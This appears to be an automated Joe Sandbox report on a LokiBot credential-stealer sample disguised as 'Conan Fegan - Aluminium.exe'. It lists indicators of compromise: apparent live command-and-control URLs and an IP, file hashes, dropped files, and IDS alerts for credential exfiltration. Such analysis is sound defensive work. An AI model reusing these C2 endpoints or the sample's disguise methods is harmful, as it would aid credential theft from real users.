http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn9 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.coma | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.fontbureau.commi | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cng | 0% | Avira URL Cloud | safe
https://www.ritcophysiotherapy.com.au/wap121/five/fre.php | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnFk | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ritcophysiotherapy.com.au | 203.170.84.89 | true | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | Avira URL Cloud: safe | unknown
http://www.ritcophysiotherapy.com.au/wap121/five/fre.php | true | Avira URL Cloud: safe | unknown
http://alphastand.top/alien/fre.php | true | Avira URL Cloud: safe | unknown
http://alphastand.win/alien/fre.php | true | Avira URL Cloud: safe | unknown
http://alphastand.trade/alien/fre.php | true | Avira URL Cloud: safe | unknown
https://www.ritcophysiotherapy.com.au/wap121/five/fre.php | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.comionF | Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/; | Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnO | Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.fonts.comc | Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.ibsensoftware.com/ | Conan Fegan - Aluminium.exe, Conan Fegan - Aluminium.exe, 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm- | Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.coma | Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.coml | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/ | Conan Fegan - Aluminium.exe, 00000000.00000003.636630818.0000000005B56000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn9 | Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | | high
http://www.ascendercorp.com/typedesigners.html | Conan Fegan - Aluminium.exe, 00000000.00000003.638473832.0000000005B8D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.coma | Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.commi | Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cn | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cng | Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnFk | Conan Fegan - Aluminium.exe, 00000000.00000003.636140982.0000000005B5E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
203.170.84.89 | unknown | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:356211
                                          Start date:22.02.2021
                                          Start time:19:12:10
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 6m 43s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:Conan Fegan - Aluminium.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@3/3@88/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 90% (good quality ratio 86.4%)
                                          • Quality average: 77%
                                          • Quality standard deviation: 28.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 66
                                          • Number of non-executed functions: 11
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 23.54.113.53, 168.61.161.212, 40.88.32.150, 51.104.139.180, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.104.144.132, 92.122.213.194, 92.122.213.247, 51.11.168.160
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356211/sample/Conan Fegan - Aluminium.exe

                                          Simulations

                                          Behavior and APIs

Time | Type | Description
19:12:58 | API Interceptor | 86x Sleep call for process: Conan Fegan - Aluminium.exe modified

                                          Joe Sandbox View / Context

                                          IPs

Match | Associated Sample Name / URL | Detection | Context
203.170.84.89 | IMG-2021-17-02557000015.gz.exe | malicious | www.ritcophysiotherapy.com.au/wap121/five/fre.php

                                          Domains

Match | Associated Sample Name / URL | Detection | Context
www.ritcophysiotherapy.com.au | IMG-2021-17-02557000015.gz.exe | malicious | 203.170.84.89

                                          ASN

Match | Associated Sample Name / URL | Detection | Context
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | DHL Document. PDF.exe | malicious | 103.67.235.120
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | urgent specification request.exe | malicious | 27.54.83.1
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | IMG-2021-17-02557000015.gz.exe | malicious | 203.170.84.89
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Purchase Enquiry.exe | malicious | 103.67.235.120
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | BELZONA Specification.exe | malicious | 103.67.235.120
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Shipment Document-REF-INV_Pdf.exe | malicious | 103.67.235.120
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | q5oRsfy1vk.exe | malicious | 103.67.235.120
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Client.vbs | malicious | 203.170.80.250
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Copy_#_824.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Copy_#_824.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Copy_#_824.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Notification #591501.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Note #83008.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Notification #591501.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Notification #591501.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Scan 108.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Scan 108.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | Scan 108.xls | malicious | 203.170.84.193
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | inv.exe | malicious | 203.170.80.250
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | https://nimb.ws/10IXxl | malicious | 103.28.48.147

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Conan Fegan - Aluminium.exe.log
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                          MD5:69206D3AF7D6EFD08F4B4726998856D3
                                          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                          C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: 1
                                          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                          Process:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16054
                                          Entropy (8bit):0.6032389203630698
                                          Encrypted:false
                                          SSDEEP:12:4/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/g/gc:s
                                          MD5:E9856AAF2BC6ABAAE1AA2CC5F0CC660D
                                          SHA1:86D357DD16FB79826BE759815CD9C0487873B899
                                          SHA-256:F48ADD5B1FBF19A72C9BC8F98DAB0EFB099E2DFC573F3996410836A8491DFE08
                                          SHA-512:FD969883E96613993D240F9E7C233734B94A7B730B6618BE15D62730F739E829554FC70156818BD42EBEC3D2E1465B5F76230459348254C15C3E67ED962AD366
                                          Malicious:false
                                          Reputation:low
                                          Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.251631180417383
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Conan Fegan - Aluminium.exe
                                          File size:398848
                                          MD5:708ee64939578fbb07010e20f6c7672c
                                          SHA1:335dc9a9142b528848b8446be2afda844f6d673f
                                          SHA256:f1a43d8b49bda3c88eb1c314c9460a92c0b467ea8db4c9086ac8e3bfe358e511
                                          SHA512:0760e722df49e3a10b26320b54648029c1d7e2862bca7f1bc4d9a60cf9a46a6d847eb3a86825ea1faa59aaa93725d601cee8c3167f4a8fe01ff4454e823fec9a
                                          SSDEEP:6144:cHxKPS22Xs/zVtvkuv4O+IpTXeUJ/K5Yd1OpGLFGY1bON94r:cfXs/vV+IFLiA4Q4Y1bDr
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.3`..............P..............*... ...@....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x462ae6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x6033CE41 [Mon Feb 22 15:31:13 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0x62a94          0x4f          .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0x64000          0x5e0         .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x66000          0xc           .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                          Sections

                                          Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                          .text   0x2000           0x60aec       0x60c00   False     0.710743196867   data       7.26782540442   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc   0x64000          0x5e0         0x600     False     0.431640625      data       4.16085866295   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc  0x66000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name         RVA      Size   Type                                                                         Language  Country
                                          RT_VERSION   0x64090  0x350  data
                                          RT_MANIFEST  0x643f0  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLL          Import
                                          mscoree.dll  _CorExeMain

                                          Version Infos

                                          Description       Data
                                          Translation       0x0000 0x04b0
                                          LegalCopyright    Copyright Microsoft 2014
                                          Assembly Version  1.0.0.0
                                          InternalName      CallConvCdecl.exe
                                          FileVersion       1.0.0.0
                                          CompanyName       Microsoft
                                          LegalTrademarks
                                          Comments
                                          ProductName       WinClient
                                          ProductVersion    1.0.0.0
                                          FileDescription   WinClient
                                          OriginalFilename  CallConvCdecl.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp                 Protocol  SID      Message                                                                  Source Port  Dest Port  Source IP    Dest IP
                                          02/22/21-19:13:02.072161  TCP       2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1  49745        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:02.072161  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49745        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:02.072161  TCP       2025381  ET TROJAN LokiBot Checkin                                                49745        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:03.456111  TCP       2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1  49747        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:03.456111  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49747        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:03.456111  TCP       2025381  ET TROJAN LokiBot Checkin                                                49747        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:04.676480  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49749        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:04.676480  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49749        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:04.676480  TCP       2025381  ET TROJAN LokiBot Checkin                                                49749        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:06.053559  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49750        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:06.053559  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49750        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:06.053559  TCP       2025381  ET TROJAN LokiBot Checkin                                                49750        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:07.581441  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49751        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:07.581441  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49751        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:07.581441  TCP       2025381  ET TROJAN LokiBot Checkin                                                49751        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:09.379899  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1                    49752        80         192.168.2.4  203.170.84.89
                                          02/22/21-19:13:09.379899  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                            49752        80         192.168.2.4  203.170.84.89
